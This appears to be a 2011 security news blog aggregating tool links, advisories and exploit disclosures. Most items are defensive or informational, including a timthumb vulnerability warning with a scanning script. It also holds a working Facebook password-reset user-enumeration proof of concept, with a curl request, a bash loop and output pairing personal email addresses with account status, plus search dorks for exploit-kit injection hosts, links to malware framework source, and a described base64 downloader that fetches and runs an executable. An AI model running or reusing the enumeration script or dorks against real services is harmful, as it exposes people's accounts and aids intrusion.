Wednesday, 3. August 2011
Script Deobfuscation Tools
Web pages that contain exploits often use a series of redirects and obfuscated code to make the chain harder to follow. Programs useful for exploring malicious pages:

* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/


nSpaces
nSpaces: Multiple virtual Desktops With Password Protection and easy switch
Features of nSpaces

Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.
Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique. Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t like to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t like anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you created and a hotkey for the space switcher. You can change whatever you want.
nSpaces is easy to use, with a simple menu-driven GUI. It is fast to configure, change and save.

Download
http://www.bytesignals.com/binary/nspaces/setup.exe


Websitedefender
Features of WebsiteDefender

Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security

Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php


Hexinject - Linux
These are the current features of Hexinject:

Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)

Download
http://sourceforge.net/projects/hexinject/files/


WordPress image utility - PHP Upload
The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.

Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
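
As an added example (not code from the source post or from the timthumb project), this Python script automates the two checks described above: it reports any timthumb.php whose $allowedSites array is not empty, and any PHP file that calls base64_decode and also contains a long encoded string. It assumes the list is declared as `$allowedSites = array(...);` and treats a run of 200 or more base64 characters as "long"; the sample directory tree is constructed.

```python
import os
import re
import tempfile

# Assumption: timthumb.php declares the list as  $allowedSites = array( ... );
ALLOWED_SITES = re.compile(r"\$allowedSites\s*=\s*array\s*\((.*?)\)\s*;", re.S)
QUOTED = re.compile(r"""(['"])(.+?)\1""")
# Assumption: 200+ base64 characters in one run counts as a "long encoded string".
LONG_B64 = re.compile(r"[A-Za-z0-9+/=]{200,}")


def audit(root):
    """Return sorted (relative path, finding) tuples for PHP files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            rel = os.path.relpath(path, root)
            if name.lower() == "timthumb.php":
                m = ALLOWED_SITES.search(text)
                hosts = [h for _q, h in QUOTED.findall(m.group(1))] if m else []
                if hosts:
                    findings.append((rel, "allowedSites not empty: " + ", ".join(hosts)))
            if "base64_decode" in text and LONG_B64.search(text):
                findings.append((rel, "base64_decode with long encoded string"))
    return sorted(findings)


def build_sample(root):
    """Constructed sample tree: stock-style timthumb.php, a cache file, a benign file."""
    theme = os.path.join(root, "wp-content", "themes", "demo")
    os.makedirs(os.path.join(theme, "cache"))
    with open(os.path.join(theme, "timthumb.php"), "w") as fh:
        fh.write("<?php\n$allowedSites = array (\n\t'flickr.com',\n\t'blogger.com',\n);\n")
    with open(os.path.join(theme, "cache", "x.php"), "w") as fh:
        fh.write("<?php $p = base64_decode('" + "QUJD" * 60 + "');\n")
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write("<?php echo base64_decode('aGk=');\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, finding in audit(tmp):
            print(f"{rel}: {finding}")
```

A short base64_decode call such as the one in functions.php is not reported; only files that pair the call with a long encoded run are, which keeps the output to what needs manual review.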


Android Trojan records phone calls - Android
A Trojan spying on your conversations

Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx


Practical C++ Decompilation
Practical C++ decompilation: how to handle it in IDA and the Hex-Rays decompiler. You can get the slides here
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here.
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation


Best Pack exploit kit
New injection url is 1see[dot]ir/j/. Currently leading to a Best Pack exploit kit

Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/


Facebook password recovery
Step by step:

- Go to http://m.facebook.com

- Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- Try using a real email address and try to use a fake email address,
you will see two different behaviors.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing an email address through
the "ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
    s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep form>/dev/null);
    if [ $? -eq 0 ]; then
        echo "$mail No tiene cuenta.";
    else
        echo "$mail Si tiene cuenta.";
    fi
done

#+----- EOF ------+


You can enumerate users by using a list of email addresses or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO

by
Zerial


Tuesday, 2. August 2011
12,000 sqli vulnerable sites
Source
http://pastebin.com/GYNVsR1W

by
The Snake


Web Application Scanners
A Comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability Scanners.

By Shay Chen
Security Consultant, Researcher & Instructor
http://sectooladdict.blogspot.com/
sectooladdict-$at$-gmail-$dot$-com
August 2011
Assessment Environments: WAVSEP 1.0 / WAVSEP 1.0.3 (http://code.google.com/p/wavsep/)


"google" spyeye-blackhole exploit kit
As per Google search results, it looks like 160,000 sites have been compromised recently (Spyeye & Black hole Exploit kit)

Dork:
exero.eu/catalog/jquery.js


Released Watcher v.1.5.3
Web security testing tool and passive vulnerability scanner

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Download
http://websecuritytool.codeplex.com/releases/view/22212


HexorBase v.1.0
HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

Download
http://code.google.com/p/hexorbase/downloads/list


Metasploit 4.0
"It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's flexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions."

Download

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-mini.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-full.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-mini.run

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run

http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2

Metasploit 4.0 And Armitage - What's New?


Anonware malware framework - C#
Source
http://pastebin.com/MFc4SY3S

download complete everything @
http://www.megaupload.com/?d=QKMY6HRW
UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^)


Black Hat 2011
LAS VEGAS — The 2011 Black Hat security conference is promising a smorgasbord of (in)security fun. From vulnerabilities in PLCs (programmable logic controllers) to the security design of Apple’s iOS and potential hacker attacks on medical implant devices, the range of presentations this year could be the best ever.

Here’s a list of this year’s can’t-miss presentations:
http://www.zdnet.com/blog/security/black-hat-10-cant-miss-hacks-and-presentations/9132


Sunday, 31. July 2011
Downloader - Visual Basic
Convert the EXE file to Base64 and upload it to a website. The downloader downloads it and saves it as a text file. The downloader will then convert the Base64 text to binary, save it as an executable, and then execute it.

Download base64:
http://download.cnet.com/Base64-De-Encoder/3000-2247_4-10571789.html


Cross Site Scripting "XSS" - Dokumentation, Analyse & Techniken "German"
Download PDF
http://www.vulnerability-lab.com/resources/documents/198.pdf


Skype (VoIP) - Denial of Service "DOS"


Saturday, 30. July 2011
DEFCON 18: How to Hack Routers 1-3





McDonalds.de - XSS
e.g.
http://tinyurl.com/3thjtw4


Facebook Security Bug Bounty
To show our appreciation for our security researchers, we offer a monetary bounty for certain qualifying security bugs. Here's how it works.
A typical bounty is $500 USD
We may increase the reward for specific bugs
Only 1 bounty per security bug will be awarded

Source:
http://www.facebook.com/whitehat/bounty/


Friday, 29. July 2011
Websecurify 0.9
Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies.

Download
http://code.google.com/p/websecurify/downloads/list


IDA PRO 2nd Edition
Here is the core information about the book,

Title: IDA PRO Book – 2nd Edition
Author: Chris Eagle
Publisher: No Starch Press
Pages: 672
Release Date: July 14, 2011

Here is the table of contents

PART I: Introduction to IDA
Chapter 1: Introduction to Disassembly
Chapter 2: Reversing and Disassembly Tools
Chapter 3: IDA Pro Background

PART II: Basic IDA Usage
Chapter 4: Getting Started with IDA
Chapter 5: IDA Data Displays
Chapter 6: Disassembly Navigation
Chapter 7: Disassembly Manipulation
Chapter 8: Datatypes and Data Structures
Chapter 9: Cross-References and Graphing
Chapter 10: The Many Faces of IDA

PART III: Advanced IDA Usage
Chapter 11: Customizing IDA
Chapter 12: Library Recognition Using FLIRT Signatures
Chapter 13: Extending IDA’s Knowledge
Chapter 14: Patching Binaries and Other IDA Limitations

PART IV: Extending IDA’s Capabilities
Chapter 15: IDA Scripting
Chapter 16: The IDA Software Development Kit
Chapter 17: The IDA Plug-in Architecture
Chapter 18: Binary Files and IDA Loader Modules
Chapter 19: IDA Processor Modules

PART V: Real-World Applications
Chapter 20: Compiler Personalities
Chapter 21: Obfuscated Code Analysis
Chapter 22: Vulnerability Analysis
Chapter 23: Real-World IDA Plug-ins

PART VI: The IDA Debugger
Chapter 24: The IDA Debugger
Chapter 25: Disassembler/Debugger Integration
Chapter 26: Additional Debugger Features

Appendix A: Using IDA Freeware 5.0
Appendix B: IDC/SDK Cross-Reference

Book:
http://www.nostarch.com/idapro2.htm


SQueRT 0.9.0
Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets.

Download
http://www.squertproject.org/download
